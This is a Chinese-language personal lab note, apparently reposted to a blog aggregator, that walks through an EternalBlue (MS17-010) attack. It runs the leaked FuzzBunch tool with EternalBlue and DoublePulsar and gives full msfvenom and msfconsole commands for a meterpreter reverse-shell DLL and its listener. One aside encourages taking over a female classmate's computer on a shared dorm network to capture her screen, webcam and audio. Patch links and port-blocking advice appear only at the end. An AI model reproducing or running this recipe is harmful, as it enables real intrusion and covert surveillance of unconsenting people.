微软EternalBlue永恒之蓝漏洞攻击测试
聲明:僅供學(xué)習(xí)交流使用,個人實驗筆記。排版比較懶。
微軟MS17-010
理論:SMBv1 漏洞攻擊,445端口。
環(huán)境準(zhǔn)備:
攻擊資源:攻擊工具包 點我
攻擊者系統(tǒng):Windows 7 Ultimate (x64) 點我
受害者系統(tǒng):Windows 7 Ultimate (x64) 點我,winXP,win2008,win2003均可。 點我
輔助攻擊用系統(tǒng):kali 點我
推薦虛擬環(huán)境構(gòu)建工具:vmware workstation或oracle Vbox工具下載
操作:
1、攻擊者環(huán)境部署(確保路徑全英文):
虛擬機(jī)部署win7 64位環(huán)境,要么都橋接,要么都選擇自定義網(wǎng)絡(luò)。
下載python2.6并安裝點我
下載pywin32并安裝,一定要注意,下載對應(yīng)python版本點我
將C:\Python26添加到環(huán)境變量PATH中。
將攻擊工具包拖入虛擬機(jī),或上傳到虛擬機(jī)。解壓后,里面有個Windows的目錄,復(fù)制出來到虛擬機(jī)的c盤。
新建 listeningposts 目錄。
2、受害者環(huán)境部署:
受害者系統(tǒng)自選一個就行,隨意,安裝后,需要和攻擊者系統(tǒng)能互相ping通。
3、攻擊操作:
攻擊者在cmd下運(yùn)行fb.py target IP就是受害者IP callbackIP就是攻擊者的IP USE redirection輸入NO base log 輸入 c:\logs或輸入NO(是否有日志記錄,這個是自愿) 接著輸入0,新建了一個攻擊項目。 項目名稱隨意(英文以外名字可能會報錯)。 然后輸入yes確認(rèn) 其他的直接回車就行了。英文可以用有道翻譯。 use EternalBlue 問你是否要setting。輸入yes 下面的回車就好,都是默認(rèn)好的配置。 target system,如實選擇受害者的系統(tǒng)。 mode選擇fb,即輸入1。 剩下的就是yes和回車了。 當(dāng)出現(xiàn)success關(guān)鍵詞的時候,說明攻擊第一步已經(jīng)完成了。 (失敗的原因: 1、防火墻的保護(hù)。 2、殺毒程序的保護(hù)。 3、網(wǎng)絡(luò)通信異常。 4、人為操作失誤。)部署輔助攻擊系統(tǒng):
1、部署kali,可以和攻擊者正常通信即可。 2、攻擊者安裝xshell。 3、通過xshell ssh到kali即可。(百度關(guān)鍵詞,kali開啟和配置ssh服務(wù)) 4、利用kali 的msf生成后門文件。(LPORT端口參數(shù)隨意,只要不沖突就行) 如果受害者是winXP 32位: msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali系統(tǒng)的ip LPORT=19999 -f dll > /tmp/attack.dll 如果受害者是win7 64位: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=kali的ip LPORT=5555 -f dll > /tmp/attack.dll 確認(rèn)xshell已經(jīng)連接到了kali, 在xshell輸入:sz /opt/attack.dll 選擇保存在攻擊者系統(tǒng)的c盤根目錄下即可。 xshell下: msfconsole use exploit/multi/handler //啟用了監(jiān)聽模塊 受害者是winXP的時候: ( set payload windows/meterpreter/reverse_tcp set LHOST kali的ip set LPORT 19999 show options //看一眼配置 run //開啟了監(jiān)聽 ) 受害者是win7 64位時: ( msf > use exploit/multi/handler msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf exploit(handler) > set lhost kali的ip msf exploit(handler) > set lport 5555 msf exploit(handler) > exploit )在攻擊者的cmd下: use Doublepulsar 操作系統(tǒng)選擇目標(biāo)的。 選擇RunDLL 路徑輸入:c:\attack.dll 其他各種回車確認(rèn)。 可以看到,xshell連接的kali,收到了會話連接。 可以輸入whoami或者dir來驗證一下。其他資源(感覺部署環(huán)境好麻煩,想來點現(xiàn)成的):
在線現(xiàn)成的環(huán)境操作實戰(zhàn):點我在線實戰(zhàn)
kali下直接實現(xiàn)攻擊利用:http://www.jianshu.com/p/f770d0bbed77
雜談
一般情況,女生的電腦如果和你在一個網(wǎng)絡(luò),比如你們宿舍之間,沒有做嚴(yán)格的隔離,那么,理論上講,可以完整的控制她的電腦,除非她安裝了360,為何不說她安裝了騰訊管家。因為,對付一些漏洞,需要足夠的浪才可以,管家還是太文縐縐了。
(不僅可以截屏,還可以看攝像頭,還有錄音。另:現(xiàn)網(wǎng)實戰(zhàn)前,請閱讀:https://www.ishuo.cn/doc/mzlpnnqf.html)
預(yù)防和其他參考:
360提供了懶人模式的NSA攻擊自動檢測和防護(hù)工具,免安裝。點我
使用防火墻過濾/關(guān)閉 137、139、445端口。
對于 3389 遠(yuǎn)程登錄,如果不想關(guān)閉的話,至少要關(guān)閉智能卡登錄功能。
安裝微軟補(bǔ)丁:請前往微軟官方網(wǎng)站下載與自己操作系統(tǒng)匹配的安全補(bǔ)丁進(jìn)行更新
MS08-067:https://technet.microsoft.com/zh-cn/library/security/ms08-067.aspx
MS09-050:https://technet.microsoft.com/library/security/ms09-050
MS10-061:https://technet.microsoft.com/zh-cn/library/security/ms10-061.aspx
MS14-068:https://technet.microsoft.com/library/security/MS14-068
MS17-010:https://technet.microsoft.com/zh-cn/library/security/MS17-010
總結(jié)
以上是生活随笔為你收集整理的微软EternalBlue永恒之蓝漏洞攻击测试的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: C语言fopen函数的编程实现(可直接粘
- 下一篇: 志宇-分布式锁